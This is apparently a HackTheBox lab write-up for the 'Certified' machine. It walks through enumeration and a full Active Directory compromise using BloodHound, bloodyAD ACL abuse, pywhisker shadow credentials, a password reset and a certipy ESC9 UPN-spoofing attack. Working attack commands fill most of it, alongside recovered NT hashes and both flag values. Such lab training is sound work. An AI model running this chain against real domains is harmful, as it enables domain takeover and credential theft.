Setup
mkdir -p ~/ctf/HackTheBox/certified/scans; cd ~/ctf/HackTheBox/certified
IP Address: 10.10.11.41
echo "10.10.11.41 certified.htb" | sudo tee -a /etc/hosts
10.10.11.41 certified.htb
As this is a Assumed Breach scenario Box, we are given the following credentials to start with:
judith.mader:judith09
Enumeration
nmap -sC -sV -Pn -p- certified.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 certified.htb
# nmap findings
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49689/tcp open unknown syn-ack ttl 127
49690/tcp open unknown syn-ack ttl 127
49691/tcp open unknown syn-ack ttl 127
49720/tcp open unknown syn-ack ttl 127
49729/tcp open unknown syn-ack ttl 127
now using Netexec and the provided credentials, we enumerate ldap(port 389) and smb(port 445).
Shares:
Users:
Administrator
Guest
krbtgt
judith.mader
management_svc
ca_operator
alexander.huges
harry.wilson
gregory.cameron
Using LDAP enumeration, we find that the user management_svc is Kerberoastable:
Using Hashcat we try to crack this password .\hashcat.exe -m 13100 .\hash.txt .\rockyou.txt
but were unsuccessfull.
Using nxc ldap 10.10.11.41 -d certified.htb -u judith.mader -p judith09 --dns-server 10.10.11.41 --bloodhound -c All
we get a bloodhound zip file to enumerate further.
using Bloodhound we find that we can traverse to ca_operator using the below path:
Setting Managment group’s owner to Judith
Using the bloodyAD tool we set the owner to judith:
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 set owner Management judith.mader
Using the below command we give judith genericAll rights to Management group so that we can add judith to the group
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add genericAll Management judith.mader
Now we add judith user to Managment so that we can also have GenericWrite rights on Managment_SVC User.
bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add groupMember Management judith.mader
GenericWrite on Management_SVC
to exploit this we have to use PyWhiskers to exploit Shadow Credentials.
./pywhisker -d certified.htb -u judith.mader -p judith09 --target management_svc --action add --filename mgmt_svc
python3 PKINITtools/gettgtpkinit.py -cert-pfx venv/bin/mgmt_svc.pfx -pfx-pass xXGg4pFUaqdvN04gqYuF certified.htb/management_svc management_svc.ccache
python3 PKINITtools/getnthash.py -key 1ff1c8b4ea8d572eb1f773b5481a026a23e10b2a724caeb889ee398319724525 certified.htb/management_svc
From the above shadow attack we get the NT hash for management_svc user
management_svc:a091c1832bcdd4677c28b5a6a1295584
Using Netexec we verify this is the correct hash
We have winrm on management_svc
User Flag
Location: C:\Users\management_svc\Desktop | Flag: b4f932ca96fde437b29e2b73dd312357
Privilege Escalation
GenericAll rights on CA_Operator
using bloodyAD --host 10.10.11.41 -d certified.htb -u management_svc -p :a091c1832bcdd4677c28b5a6a1295584 set password ca_operator Password@1!
we change the password for ca_operator account as we have the genericall rights on management_svc.
Certipy
Using certipy find -u ca_operator@certified.htb -p 'Password@1!' -dc-ip 10.10.11.41 -vulnerable -text -enabled
we find that ‘CertifiedAuthentication’ Template is vulnerable to ESC9 - Template has no security extension.
Since we have GenericAll from Management_SVC-> CA_operator
Using certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
, we spoof the upn for ca_operator
Using certipy req -username ca_operator@certified.htb -hashes dbf36575210cc5a38ab4050cc6a2e9aa -ca certified-DC01-CA -template CertifiedAuthentication
we request the certificate, Since this template disables security checks and trusts the UPN field.
Using the obtained certificate we authenticate and get the NT hash using certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'
administrator:0d5b49608bbce1751f708748f67e2d34
Now we revert the upn for ca_operator back to original
We verify the access using nxc and evil-winrm:
Root Flag
Location: C:\Users\Administrator\Desktop | Flag: a5404d7db96e03dfa194c6ba6c04dffb